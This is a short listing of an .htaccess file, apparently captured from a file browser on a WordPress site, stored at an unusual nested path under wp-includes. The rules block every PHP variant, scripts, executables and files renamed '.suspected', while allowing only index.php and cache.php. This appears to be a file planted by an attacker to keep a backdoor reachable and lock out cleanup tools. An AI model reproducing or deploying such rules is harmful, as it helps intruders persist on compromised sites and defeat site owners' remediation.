• File: .htaccess
  • Full Path: /home/eliteafr/www/wp-includes/blocks/missing/missing/.htaccess
  • File size: 219 bytes
  • MIME-type: text/plain
  • Charset: utf-8
<FilesMatch ".(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|pHP7|PHP7|phP|PhP|php5|suspected)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(index.php|cache.php)$">#
Order allow,deny
Allow from all
</FilesMatch>